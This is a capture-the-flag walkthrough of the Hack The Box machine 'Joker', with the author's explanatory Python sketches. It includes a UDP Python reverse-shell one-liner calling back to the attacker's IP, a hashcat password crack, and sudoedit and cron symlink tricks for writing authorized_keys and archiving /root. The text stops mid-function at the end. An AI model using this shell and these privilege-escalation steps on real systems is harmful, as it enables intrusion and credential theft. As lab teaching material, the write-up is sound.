Joker - HTB Hard Machine

About

Joker can be a tough machine because it gives few hints about the correct path, although the name does suggest a connection to wildcards. It covers many different topics and is an excellent learning experience.

Exploitation

Enumeration

I started with an nmap scan and found three open ports: SSH (TCP/22), a Squid http-proxy (TCP/3128), and TFTP (UDP/69).

```
## TCP scan
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-24 16:39 -03
Nmap scan report for 10.10.10.21
Host is up (0.17s latency).
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.3p1 Ubuntu 1ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 88:24:e3:57:10:9f:1b:17:3d:7a:f3:26:3d:b6:33:4e (RSA)
|   256 76:b6:f6:08:00:bd:68:ce:97:cb:08:e7:77:69:3d:8a (ECDSA)
|_  256 dc:91:e4:8d:d0:16:ce:cf:3d:91:82:09:23:a7:dc:86 (ED25519)
3128/tcp open  http-proxy Squid http proxy 3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/3.5.12
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.52 seconds

## UDP scan (--top-ports 1000)
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-24 16:39 -03
Warning: 10.10.10.21 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.10.21
Host is up, received user-set (0.17s latency).
Not shown: 973 closed udp ports (port-unreach), 26 open|filtered udp ports (no-response)
PORT   STATE SERVICE REASON     VERSION
69/udp open  tftp    script-set Netkit tftpd or atftpd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1231.03 seconds

## Runtime
00:22:52
```

Next, I looked at port 3128. The scan identified this as a Squid http-proxy. A proxy server like this acts as an intermediary for web requests. Instead of my machine connecting directly to a website, I would configure my browser or tools to send the request to the proxy (10.10.10.21:3128). The proxy then forwards that request, likely to internal services that aren't exposed to the network.





I tried configuring this proxy in my browser using FoxyProxy.

When I tried to connect, it prompted for credentials. The "realm" was listed as "kalamari," which was a strong hint for a potential username.

I moved on to UDP port 69, which was running TFTP (Trivial File Transfer Protocol). TFTP is a simple protocol for transferring files over UDP. Unlike FTP, it has no authentication and no directory listing, so to download a file you must know its exact path and name. That simplicity becomes a weakness when the server is not confined to a dedicated directory and hands out arbitrary files to anyone who asks.
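Because TFTP has no login step, a read request is nothing more than one short UDP datagram naming the file. The sketch below builds that request and classifies the server's first reply, following the packet layouts in RFC 1350 (opcode 1 is a read request, 3 is data, 5 is an error; error code 2 is "Access violation"). The function names are my own rather than part of any library, and `first_reply` assumes the server answers within the timeout.

```python
import socket
import struct

# Opcodes and error codes as defined in RFC 1350.
OP_RRQ, OP_DATA, OP_ERROR = 1, 3, 5
ERROR_NAMES = {1: "File not found", 2: "Access violation"}


def build_rrq(filename: str, mode: str = "octet") -> bytes:
    """Read request: opcode, filename, NUL, transfer mode, NUL (there is no credentials field)."""
    return struct.pack("!H", OP_RRQ) + filename.encode() + b"\x00" + mode.encode() + b"\x00"


def parse_reply(packet: bytes):
    """Classify the first datagram a TFTP server sends back."""
    (opcode,) = struct.unpack("!H", packet[:2])
    if opcode == OP_DATA:
        (block,) = struct.unpack("!H", packet[2:4])
        return ("DATA", block, packet[4:])
    if opcode == OP_ERROR:
        (code,) = struct.unpack("!H", packet[2:4])
        message = packet[4:].split(b"\x00", 1)[0].decode(errors="replace")
        return ("ERROR", code, message or ERROR_NAMES.get(code, "unknown"))
    return ("OTHER", opcode, packet[2:])


def first_reply(host: str, filename: str, timeout: float = 5.0):
    """Send one read request to UDP/69 and parse the first reply.

    The server answers from a new ephemeral port, so this uses recvfrom()
    on an unconnected socket instead of connect().
    """
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_rrq(filename), (host, 69))
        packet, _server = sock.recvfrom(4 + 512)
        return parse_reply(packet)
```

Against this box, `first_reply("10.10.10.21", "/etc/passwd")` should come back as an ERROR tuple with code 2, matching the client behaviour described here. It only reads the first data block, so it is a probe, not a full download.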

I tried to grab a common file, /etc/passwd, to test this.

```
└─ $ tftp 10.10.10.21
tftp> get /etc/passwd
Error code 2: Access violation
```

It returned an "Access violation" error. Just to be sure, I tried a filename that definitely shouldn't exist.

```
tftp> get /tmp/nika
Error code 2: Access violation
```

This returned the exact same "Access violation" message. This meant I couldn't use the error to differentiate between files that exist and files that don't. The server was configured to deny access, but it wasn't telling me why.

Foothold

I searched for information on Squid 3.5.12 (the version from the nmap scan) and found the official Squid wiki. It mentioned the default configuration file locations.

Note

The squid.conf file. By default, this file is located at /etc/squid/squid.conf or maybe /usr/local/squid/etc/squid.conf.

I decided to try downloading this file via TFTP.

```
tftp> get /etc/squid/squid.conf
```

This time the client printed no error (it doesn't print an explicit success message either), and when I checked my local directory, the squid.conf file was there. I confirmed the download was successful.

```
┌── ➤ joker
└─ $ head squid.conf
# WELCOME TO SQUID 3.5.12
# ----------------------------
#
# This is the documentation for the Squid configuration file.
# This documentation can also be found online at:
# http://www.squid-cache.org/Doc/config/
#
# You may wish to look at the Squid home page and wiki for the
# FAQ and other documentation:
# http://www.squid-cache.org/
```

I used grep to filter out all the commented and blank lines, leaving only the active configuration. This revealed a very interesting line: auth_param basic program /usr/lib/squid/basic_ncsa_auth /etc/squid/passwords.
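The same filter (`grep -v '^#' | grep -v '^$'`) is easy to reproduce in Python. A second pass can then pull out the authentication helper and its arguments, which is where the password file path lives. This is a sketch with hypothetical helper names, checked against a few lines taken from this squid.conf.

```python
def active_lines(config_text: str) -> list[str]:
    """Equivalent of: grep -v '^#' | grep -v '^$' (whitespace-only lines survive, as with grep)."""
    return [line for line in config_text.splitlines() if line and not line.startswith("#")]


def auth_helpers(lines: list[str]) -> list[list[str]]:
    """Return the command of every 'auth_param basic program ...' directive."""
    helpers = []
    for line in lines:
        parts = line.split()
        if parts[:3] == ["auth_param", "basic", "program"]:
            helpers.append(parts[3:])  # helper binary followed by its arguments
    return helpers


# A shortened excerpt of the squid.conf retrieved over TFTP.
SAMPLE = """# WELCOME TO SQUID 3.5.12
#
http_access deny manager

auth_param basic program /usr/lib/squid/basic_ncsa_auth /etc/squid/passwords
auth_param basic realm kalamari
http_port 3128
"""
```

Running `auth_helpers(active_lines(SAMPLE))` yields the helper `/usr/lib/squid/basic_ncsa_auth` with `/etc/squid/passwords` as its argument. That second element is the file worth requesting next over TFTP.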

```
└─ $ cat squid.conf | grep -v '^#' | grep -v '^$'
acl SSL_ports port 443
acl Safe_ports port 80 # http
acl Safe_ports port 21 # ftp
acl Safe_ports port 443 # https
acl Safe_ports port 70 # gopher
acl Safe_ports port 210 # wais
acl Safe_ports port 1025-65535 # unregistered ports
acl Safe_ports port 280 # http-mgmt
acl Safe_ports port 488 # gss-http
acl Safe_ports port 591 # filemaker
acl Safe_ports port 777 # multiling http
acl CONNECT method CONNECT
http_access deny !Safe_ports
http_access deny CONNECT !SSL_ports
http_access deny manager
auth_param basic program /usr/lib/squid/basic_ncsa_auth /etc/squid/passwords
auth_param basic realm kalamari
acl authenticated proxy_auth REQUIRED
http_access allow authenticated
http_access deny all
http_port 3128
coredump_dir /var/spool/squid
refresh_pattern ^ftp: 1440 20% 10080
refresh_pattern ^gopher: 1440 0% 1440
refresh_pattern -i (/cgi-bin/|\?) 0 0% 0
refresh_pattern (Release|Packages(.gz)*)$ 0 20% 2880
refresh_pattern . 0 20% 4320
```

This looked like the password file for the proxy. I went back to my TFTP client and successfully downloaded /etc/squid/passwords. This gave me a hash for the user kalamari, the same name as the realm I saw earlier.

```
┌── ➤ joker
└─ $ cat passwords
kalamari:$apr1$zyzBxQYW$pL360IoLQ5Yum5SLTph.l0
```

I ran hashid on the hash to identify its type. It came back as MD5(APR), also known as Apache MD5.

```
└─ $ hashid passwords
--File 'passwords'--
Analyzing '$apr1$zyzBxQYW$pL360IoLQ5Yum5SLTph.l0'
[+] MD5(APR)
[+] Apache MD5
--End of file 'passwords'--
```

A quick check with hashcat -h confirmed this hash type corresponds to mode 1600. Now I had everything I needed to crack it.

```
└─ $ hashcat -h | grep apr
1600 | Apache $apr1$ MD5, md5apr1, MD5 (APR) | FTP, HTTP, SMTP, LDAP Server
```

Tip

I could also have found the hash mode directly by using hashid with the -m flag.

```
└─ $ hashid passwords -m
--File 'passwords'--
Analyzing '$apr1$zyzBxQYW$pL360IoLQ5Yum5SLTph.l0'
[+] MD5(APR) [Hashcat Mode: 1600]
[+] Apache MD5 [Hashcat Mode: 1600]
--End of file 'passwords'--
```

I ran hashcat against the hash file using the rockyou.txt wordlist, and it quickly found the password: ihateseafood
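Mode 1600 is the md5crypt algorithm with `$apr1$` as its prefix. It is a salted MD5 stretched through 1,000 rounds and then encoded with a crypt-style base64 alphabet. The sketch below is my own Python port of that algorithm, following the classic FreeBSD/APR C implementation. It adds a naive dictionary loop standing in for what hashcat does much faster, and it is meant for understanding, not as a replacement for hashcat.

```python
import hashlib

# Alphabet used by crypt(3)-style hashes (not standard base64).
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value: int, length: int) -> str:
    """Emit `length` characters, 6 bits at a time, least significant bits first."""
    out = []
    for _ in range(length):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def md5_crypt(password: str, salt: str, magic: str = "$apr1$") -> str:
    """md5crypt; with magic='$apr1$' this is the Apache variant (hashcat mode 1600)."""
    pw = password.encode()
    salt_b = salt.encode()[:8]
    magic_b = magic.encode()

    ctx = hashlib.md5(pw + magic_b + salt_b)
    alt = hashlib.md5(pw + salt_b + pw).digest()
    # Add len(pw) bytes of the alternate digest, 16 bytes at a time.
    remaining = len(pw)
    while remaining > 0:
        ctx.update(alt[:min(16, remaining)])
        remaining -= 16
    # Quirk of the original C code: for each bit of len(pw), add a NUL byte
    # (bit set) or the first password byte (bit clear).
    bits = len(pw)
    while bits:
        ctx.update(b"\x00" if bits & 1 else pw[:1])
        bits >>= 1
    final = ctx.digest()

    # 1000 rounds of key stretching.
    for i in range(1000):
        h = hashlib.md5()
        h.update(pw if i & 1 else final)
        if i % 3:
            h.update(salt_b)
        if i % 7:
            h.update(pw)
        h.update(final if i & 1 else pw)
        final = h.digest()

    # Encode the 16 digest bytes in the algorithm's fixed byte order.
    f = final
    encoded = (
        _to64((f[0] << 16) | (f[6] << 8) | f[12], 4)
        + _to64((f[1] << 16) | (f[7] << 8) | f[13], 4)
        + _to64((f[2] << 16) | (f[8] << 8) | f[14], 4)
        + _to64((f[3] << 16) | (f[9] << 8) | f[15], 4)
        + _to64((f[4] << 16) | (f[10] << 8) | f[5], 4)
        + _to64(f[11], 2)
    )
    return magic + salt_b.decode() + "$" + encoded


def crack(htpasswd_line: str, candidates):
    """Naive dictionary attack on one 'user:$apr1$salt$hash' line."""
    user, _, stored = htpasswd_line.strip().partition(":")
    salt = stored.split("$")[2]
    for word in candidates:
        if md5_crypt(word, salt) == stored:
            return user, word
    return None
```

Each candidate costs about a thousand MD5 computations, so a pure-Python loop over all of rockyou.txt is slow. The point is that the salt is stored alongside the hash, so every guess can be checked offline.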

```
┌── ➤ joker
└─ $ hashcat -m 1600 passwords /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
...SNIP...
$apr1$zyzBxQYW$pL360IoLQ5Yum5SLTph.l0:ihateseafood
...SNIP...
```

My first thought was to try these credentials on the open SSH port, but the password failed.

└─ $ ssh kalamari@10.10.10.21

The authenticity of host '10.10.10.21 (10.10.10.21)' can't be established.

ED25519 key fingerprint is SHA256:DCu3UkgWPWIZMeHG1ck01N+KJZq+0tvFq3qjzzplJlk.

This key is not known by any other names.

Are you sure you want to continue connecting (yes/no/[fingerprint])? yes

Warning: Permanently added '10.10.10.21' (ED25519) to the list of known hosts.

kalamari@10.10.10.21's password:



Permission denied, please try again.So, I went back to my browser's foxyproxy settings and entered the credentials I just found (kalamari:ihateseafood).



This time, the page loaded without the credential pop-up. It worked.



The proxy is likely intended for accessing internal services. I tried navigating to http://127.0.0.1/ (through the proxy, so this is the server's localhost). This returned a URL shortener page. I saw a /list directory which is supposed to show a list of shortened URLs, hinting that there were other directories to find.
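With credentials configured, each request the browser sends to Squid carries the full target URL in the request line plus a `Proxy-Authorization` header. Without that header, a proxy requiring authentication answers `407 Proxy Authentication Required`, which is what produced the "kalamari" realm prompt earlier. Below is a minimal sketch of the raw request, assuming plain HTTP (no CONNECT tunnel). The helper names are my own.

```python
import base64
import socket
from urllib.parse import urlsplit


def build_proxy_get(url: str, user: str, password: str) -> bytes:
    """HTTP/1.1 GET in absolute form, the way a client talks to a forward proxy."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    lines = [
        f"GET {url} HTTP/1.1",  # the full URL, not just the path
        f"Host: {urlsplit(url).netloc}",
        f"Proxy-Authorization: Basic {token}",  # Squid passes these to its auth helper
        "Connection: close",
        "",
        "",
    ]
    return "\r\n".join(lines).encode()


def fetch_via_proxy(proxy_host: str, proxy_port: int, raw: bytes) -> bytes:
    """Send the raw request to the proxy and read until it closes the connection."""
    chunks = []
    with socket.create_connection((proxy_host, proxy_port), timeout=10) as sock:
        sock.sendall(raw)
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)
```

`fetch_via_proxy("10.10.10.21", 3128, build_proxy_get("http://127.0.0.1/", "kalamari", "ihateseafood"))` should return the URL shortener page. The address 127.0.0.1 is resolved on the proxy's side, so it refers to the target's own loopback interface.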

I ran feroxbuster configured to use the authenticated proxy to find other directories on the internal web server. It quickly discovered a /console directory.

┌── ➤ joker

└─ $ feroxbuster -u http://127.0.0.1 --proxy http://kalamari:ihateseafood@10.10.10.21:3128 --dont-extract-links -C 404

___ ___ __ __ __ __ __ ___

|__ |__ |__) |__) | / ` / \ \_/ | | \ |__

| |___ | \ | \ | \__, \__/ / \ | |__/ |___

by Ben "epi" Risher 🤓 ver: 2.11.0

───────────────────────────┬──────────────────────

🎯 Target Url │ http://127.0.0.1

🚀 Threads │ 50

📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt

💢 Status Code Filters │ [404]

💥 Timeout (secs) │ 7

🦡 User-Agent │ feroxbuster/2.11.0

💉 Config File │ /etc/feroxbuster/ferox-config.toml

💎 Proxy │ http://kalamari:ihateseafood@10.10.10.21:3128

🏁 HTTP methods │ [GET]

🔃 Recursion Depth │ 4

──────────────────────────┴──────────────────────

🏁 Press [ENTER] to use the Scan Management Menu™

─────────────────────────────────────────────────

404 GET 23l 62w 569c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter

200 GET 28l 87w 899c http://127.0.0.1/

301 GET 4l 24w 251c http://127.0.0.1/list => http://127.0.0.1/list/

301 GET 4l 24w 251c http://127.0.0.1/list/1 => http://127.0.0.1/list/

200 GET 34l 131w 1479c http://127.0.0.1/console



...SNIP...Navigating to http://127.0.0.1/console through the proxy brought up an interactive Python web console. The page mentioned "Werkzeug," which is a Python web application library.



It looked like a full-blown interactive console. I quickly confirmed the Python version was 2.7.12, which is quite old.

I first tested for command execution by importing os and sending a ping back to my machine.

```
>>> import os
>>> os.system('ping -c1 10.10.16.3')
0
```

It worked: the call returned 0, and I saw the ICMP echo request on my tcpdump listener.

```
└─ $ sudo tcpdump -ni tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
13:52:54.775241 IP 10.10.10.21 > 10.10.16.3: ICMP echo request, id 1447, seq 1, length 64
13:52:54.775262 IP 10.10.16.3 > 10.10.10.21: ICMP echo reply, id 1447, seq 1, length 64
```

I then checked the firewall rules by reading /etc/iptables/rules.v4.

```
>>> with open('/etc/iptables/rules.v4', 'r') as f: print(f.read())
# Generated by iptables-save v1.6.0 on Fri May 19 18:01:16 2017
*filter
:INPUT DROP [41573:1829596]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [878:221932]
-A INPUT -i ens33 -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -i ens33 -p tcp -m tcp --dport 3128 -j ACCEPT
-A INPUT -i ens33 -p udp -j ACCEPT
-A INPUT -i ens33 -p icmp -j ACCEPT
-A INPUT -i lo -j ACCEPT
-A OUTPUT -o ens33 -p tcp -m state --state NEW -j DROP
COMMIT
# Completed on Fri May 19 18:01:16 2017
```

The rules showed that the INPUT policy is DROP, with explicit exceptions on ens33 for SSH (22), the proxy (3128), all UDP, and ICMP, plus all loopback traffic. More importantly, the only OUTPUT rule drops every NEW TCP connection leaving ens33. This explains why a standard TCP reverse shell wouldn't work: the firewall blocks the target from initiating the connection. UDP, however, is not blocked on output.
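The egress logic can be modelled in a few lines. iptables walks the OUTPUT chain from top to bottom, applies the first rule that matches, and falls back to the chain policy if nothing does. This is a deliberately simplified model: there are no jumps to user-defined chains, and it handles only the match types used in this ruleset. The rule is hand-copied from rules.v4.

```python
from dataclasses import dataclass
from typing import FrozenSet, Optional


@dataclass(frozen=True)
class Rule:
    out_iface: Optional[str]          # -o; None means any interface
    proto: Optional[str]              # -p; None means any protocol
    states: Optional[FrozenSet[str]]  # -m state --state; None means any state
    target: str                       # -j


# Hand-copied from the OUTPUT chain of /etc/iptables/rules.v4.
OUTPUT_POLICY = "ACCEPT"
OUTPUT_RULES = [Rule("ens33", "tcp", frozenset({"NEW"}), "DROP")]


def evaluate(out_iface: str, proto: str, state: str,
             rules=OUTPUT_RULES, policy: str = OUTPUT_POLICY) -> str:
    """Verdict for an outgoing packet: the first matching rule wins, else the policy."""
    for rule in rules:
        if rule.out_iface is not None and rule.out_iface != out_iface:
            continue
        if rule.proto is not None and rule.proto != proto:
            continue
        if rule.states is not None and state not in rule.states:
            continue
        return rule.target
    return policy
```

A TCP reverse shell starts with a NEW connection, so `evaluate("ens33", "tcp", "NEW")` gives DROP. Replies on the SSH and Squid sessions are ESTABLISHED and pass. The first datagram of a UDP shell is also NEW, but the rule only names tcp, so it falls through to the ACCEPT policy.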

I set up a socat listener on my end, listening on UDP port 9001.

```
└─ $ socat file:`tty`,raw,echo=0 UDP-LISTEN:9001
```

I found a UDP-based Python PTY shell script in this repository, linked from the 0xdf page, and ran it in the console.

```python
import pty, os, socket; s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM); s.connect(('10.10.16.3',9001)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); pty.spawn("/bin/bash");
```

This immediately connected back to my socat listener, giving me a shell as the werkzeug user.
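The one-liner works because `connect()` on a UDP socket sends nothing; it only records a default peer. After that, plain `read()` and `write()` calls on the socket's file descriptor exchange datagrams with that peer. That lets `os.dup2()` hand the socket to bash as stdin, stdout, and stderr, while `pty.spawn()` relays between them. On the other end, socat's UDP-LISTEN learns the peer address from the first datagram it receives. The loopback sketch below shows that fd-level exchange with both ends in one process and no pty. The function name is hypothetical.

```python
import os
import socket


def connected_udp_roundtrip(prompt: bytes, command: bytes):
    """Loopback model of the UDP shell: the 'victim' side only reads/writes a raw fd."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)  # plays socat UDP-LISTEN
    listener.bind(("127.0.0.1", 0))
    listener.settimeout(5)
    victim = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)    # plays the one-liner's socket
    victim.connect(listener.getsockname())  # sends nothing, just sets the default peer
    try:
        fd = victim.fileno()             # what os.dup2() copies onto fds 0, 1 and 2
        os.write(fd, prompt)             # bash writing to "stdout" sends a datagram
        received, peer = listener.recvfrom(1024)
        listener.sendto(command, peer)   # the attacker types a command
        typed = os.read(fd, 1024)        # bash reading "stdin" receives it
        return received, typed
    finally:
        victim.close()
        listener.close()
```

Calling `connected_udp_roundtrip(b"werkzeug@joker:~$ ", b"whoami\n")` returns the prompt as seen by the listener and the command as read by the victim side.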

```
└─ $ socat file:`tty`,raw,echo=0 UDP-LISTEN:9001
werkzeug@joker:~$ whoami
werkzeug
```

I tried to read the user.txt flag from alekos's home directory, but I didn't have permission. I needed to escalate my privileges.

```
werkzeug@joker:~$ cat /home/alekos/user.txt
cat: /home/alekos/user.txt: Permission denied
```

I ran a find command to look for SUID and SGID binaries, but nothing out of the ordinary came up.

```
werkzeug@joker:~$ find / -type f \( -perm -4000 -o -perm -2000 \) -exec ls -ld {} \; 2>/dev/null
```

Even without knowing the user's password, it's always worth trying sudo -l. It worked and showed that the werkzeug user can run sudoedit as the user alekos, without a password, on a specific file path: /var/www/*/*/layout.html.

```
werkzeug@joker:~$ sudo -l
Matching Defaults entries for werkzeug on joker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    sudoedit_follow, !sudoedit_checkdir

User werkzeug may run the following commands on joker:
    (alekos) NOPASSWD: sudoedit /var/www/*/*/layout.html
```

sudoedit (the same as sudo -e) lets a user edit a file as another user. It copies the specified file to a temporary location, lets me (as werkzeug) edit that copy with my own editor (like nano or vi), and then copies the modified file back to its original location with alekos's permissions. Two of the Defaults entries above matter here. sudoedit_follow lets sudoedit follow symbolic links when opening the file, which it refuses to do by default. !sudoedit_checkdir disables the check that would otherwise stop it from editing files inside directories writable by the invoking user.
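The write-back step of sudoedit essentially opens the original path for writing and copies the edited temp file into it. Ordinary file opens follow symbolic links, and sudoedit_follow is what permits that here. The sketch below is a simplified, unprivileged stand-in for that step, using a temporary directory instead of the real paths. The function names and the key text are hypothetical placeholders.

```python
import os
import tempfile


def copy_back(edited_text: str, original_path: str) -> None:
    """Simplified stand-in for sudoedit's write-back: a plain open() follows symlinks."""
    with open(original_path, "w") as fh:
        fh.write(edited_text)


def demo():
    root = tempfile.mkdtemp()
    # Stand-in for /home/alekos/.ssh/authorized_keys.
    target = os.path.join(root, "authorized_keys")
    open(target, "w").close()
    # Stand-in for /var/www/testing/nika/layout.html, a symlink to the target.
    link_dir = os.path.join(root, "testing", "nika")
    os.makedirs(link_dir)
    link = os.path.join(link_dir, "layout.html")
    os.symlink(target, link)

    copy_back("ssh-rsa AAAA...placeholder-key\n", link)
    with open(target) as fh:
        return fh.read(), os.path.islink(link)
```

After `demo()`, the text written "to layout.html" sits in the target file, and layout.html itself is still just a symlink.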

I searched for exploits related to sudoedit.

```
└─ $ searchsploit sudoedit
----------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------- ---------------------------------
(Tod Miller's) Sudo/SudoEdit 1.6.9p21/1.7.2p4 - Local Privilege Escalation | multiple/local/11651.sh
Sudo 1.8.14 (RHEL 5/6/7 / Ubuntu) - 'Sudoedit' Unauthorized Privilege Escalation | linux/local/37710.txt
SudoEdit 1.6.8 - Local Change Permission | linux/local/470.c
-------------------------
```

I read the exploit details with searchsploit -x linux/local/37710.txt. The wildcard in the sudo rule (/var/www/*/*/layout.html) is the key. I can create a path that matches this pattern and, inside it, a symbolic link named layout.html that points to a file I want to write to as alekos. To get a shell, the best target is /home/alekos/.ssh/authorized_keys.
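The rule is matched against the path string alone, and nothing checks where layout.html ultimately points. The sketch below assumes sudo matches sudoedit paths the way fnmatch(3) does with FNM_PATHNAME, where `*` never crosses a `/`. Python's fnmatch module has no such flag (its `*` also matches `/`), so this hypothetical helper compares the path one component at a time.

```python
from fnmatch import fnmatchcase


def sudo_path_match(pattern: str, path: str) -> bool:
    """Match like fnmatch(3) with FNM_PATHNAME: each '*' stays within one path component."""
    pattern_parts = pattern.split("/")
    path_parts = path.split("/")
    if len(pattern_parts) != len(path_parts):
        return False
    return all(fnmatchcase(part, pat) for part, pat in zip(path_parts, pattern_parts))


RULE = "/var/www/*/*/layout.html"
```

`sudo_path_match(RULE, "/var/www/testing/nika/layout.html")` is true no matter what layout.html links to. Only after the match does sudoedit open the file and follow the link.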

I created a directory named nika inside /var/www/testing (which I had write access to) so that the path would match the */* part of the pattern. Then, I created a symbolic link named layout.html pointing to alekos's authorized_keys file.

```
werkzeug@joker:~/testing$ mkdir nika
werkzeug@joker:~/testing/nika$ ln -s /home/alekos/.ssh/authorized_keys layout.html
```

I ran the allowed sudoedit command, specifying my new symlink.

```
sudoedit -u alekos /var/www/testing/nika/layout.html
```

It opened an empty nano buffer. That was fine: whatever I saved would be written to the symlink's target (authorized_keys).

Back on my own machine, I generated a new SSH key pair.

```
└─ $ ssh-keygen -t rsa -b 4096 -f ./id_rsa
```

I copied the public key (id_rsa.pub), pasted it into the nano editor on the target, and then saved and quit. sudoedit then wrote my public key to /home/alekos/.ssh/authorized_keys with alekos's permissions.

I set the correct permissions for the private key on my local machine.

```
└─ $ chmod 600 id_rsa
```

Finally, I used the new private key to SSH in as alekos. It worked, and I was in.

```
└─ $ ssh -i id_rsa alekos@10.10.10.21
Welcome to Ubuntu 16.10 (GNU/Linux 4.8.0-52-generic x86_64)

 * Documentation: https://help.ubuntu.com
 * Management: https://landscape.canonical.com
 * Support: https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.

Last login: Sat May 20 16:38:08 2017 from 10.10.13.210
alekos@joker:~$
```

USER

Now I could finally read the first flag.

```
alekos@joker:~$ cat user.txt
62e9b662a9e2f....
```

Privilege Escalation

Now that I was logged in as alekos, I started my enumeration process again. I checked sudo -l and looked for SUID files, but this user didn't have any special permissions or obvious vectors.

While looking around alekos's home directory, I found a backup folder. Listing the files showed something interesting: the directory itself was owned by root, but the alekos group had write permissions. All the files inside were also owned by root and were being created in five-minute intervals.
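The five-minute interval can be read straight from the archive names in this listing, such as dev-1761423001.tar.gz and dev-1761423301.tar.gz. I am assuming the number after dev- is a Unix timestamp in seconds; that is an inference from the names, not something confirmed by the script. A quick sketch that extracts and diffs them:

```python
import re
from datetime import datetime, timezone

# Assumption: the digits in dev-<digits>.tar.gz are Unix epoch seconds.
NAME_RE = re.compile(r"dev-(\d+)\.tar\.gz")


def archive_stamps(names):
    """Sorted epoch values embedded in the backup file names."""
    stamps = []
    for name in names:
        match = NAME_RE.fullmatch(name)
        if match:
            stamps.append(int(match.group(1)))
    return sorted(stamps)


def gaps(stamps):
    """Seconds between consecutive archives."""
    return [later - earlier for earlier, later in zip(stamps, stamps[1:])]


def as_utc(stamp: int) -> datetime:
    return datetime.fromtimestamp(stamp, tz=timezone.utc)
```

For the three most recent archives shown, `gaps(...)` returns `[300, 300]`: one archive every 300 seconds, which points to a scheduled job running every five minutes.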

```
alekos@joker:~/backup$ ls -la
total 696
drwxrwx--- 2 root alekos 12288 Oct 26 00:20 .
drwxr-xr-x 7 alekos alekos 4096 May 19 2017 ..
-rw-r----- 1 root alekos 40960 Dec 24 2017 dev-1514134201.tar.gz
-rw-r----- 1 root alekos 40960 Dec 24 2017 dev-1514134501.tar.gz
-rw-r----- 1 root alekos 40960 Oct 25 23:10 dev-1761423001.tar.gz
-rw-r----- 1 root alekos 40960 Oct 25 23:15 dev-1761423301.tar.gz
-rw-r----- 1 root alekos 40960 Oct 25 23:20 dev-1761423601.tar.gz
...SNIP...
```

I inspected the contents of the most recent archive to see what was being backed up. It contained all the files from the /home/alekos/development directory.

```
alekos@joker:~/backup$ tar tvf dev-1761428401.tar.gz
-rw-r----- alekos/alekos 0 2017-05-18 19:01 __init__.py
-rw-r----- alekos/alekos 1452 2017-05-18 19:01 application.py
drwxrwx--- alekos/alekos 0 2017-05-18 19:01 data/
-rw-r--r-- alekos/alekos 12288 2017-05-18 19:01 data/shorty.db
-rw-r----- alekos/alekos 997 2017-05-18 19:01 models.py
drwxr-x--- alekos/alekos 0 2017-05-18 19:01 static/
-rw-r----- alekos/alekos 1585 2017-05-18 19:01 static/style.css
drwxr-x--- alekos/alekos 0 2017-05-18 19:01 templates/
-rw-r----- alekos/alekos 524 2017-05-18 19:01 templates/layout.html
-rw-r----- alekos/alekos 231 2017-05-18 19:01 templates/not_found.html
-rw-r----- alekos/alekos 725 2017-05-18 19:01 templates/list.html
-rw-r----- alekos/alekos 193 2017-05-18 19:01 templates/display.html
-rw-r----- alekos/alekos 624 2017-05-18 19:01 templates/new.html
-rw-r----- alekos/alekos 2500 2017-05-18 19:01 utils.py
-rw-r----- alekos/alekos 1748 2017-05-18 19:01 views.py
```

This looked like a cron job running as root that was archiving the /home/alekos/development directory. Since I was alekos, I had full control over the development directory itself, because it lives in my home directory. If the backup script (running as root) just archives ~/development, what if development wasn't a directory, but a symbolic link?

I could replace the development directory with a symlink pointing to /root. The backup process, when it ran as root, should follow the link and archive the contents of the /root directory instead.
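I didn't have the backup script at this point, but the archive listing has no development/ prefix on its entries. That suggests the script changes into the directory and archives its contents. Under that assumption, the sketch below shows why the symlink trick works: changing directory follows the link, while archiving the link path itself would store only the link. The helper names are hypothetical, and Python's tarfile stands in for the real tar invocation.

```python
import os
import tarfile
import tempfile


def backup_like_cron(src_dir: str, out_path: str) -> None:
    """Assumed behaviour: change into src_dir, then archive everything in it."""
    out_path = os.path.abspath(out_path)
    previous = os.getcwd()
    os.chdir(src_dir)  # like `cd`, this follows a symlink to its target
    try:
        with tarfile.open(out_path, "w") as tar:
            for name in sorted(os.listdir(".")):
                tar.add(name)
    finally:
        os.chdir(previous)


def demo():
    base = tempfile.mkdtemp()
    secret_dir = os.path.join(base, "root")  # stand-in for /root
    os.mkdir(secret_dir)
    with open(os.path.join(secret_dir, "root.txt"), "w") as fh:
        fh.write("flag\n")
    link = os.path.join(base, "development")  # stand-in for ~/development -> /root
    os.symlink(secret_dir, link)

    via_cd = os.path.join(base, "via_cd.tar")
    backup_like_cron(link, via_cd)
    with tarfile.open(via_cd) as tar:
        names = tar.getnames()

    direct = os.path.join(base, "direct.tar")
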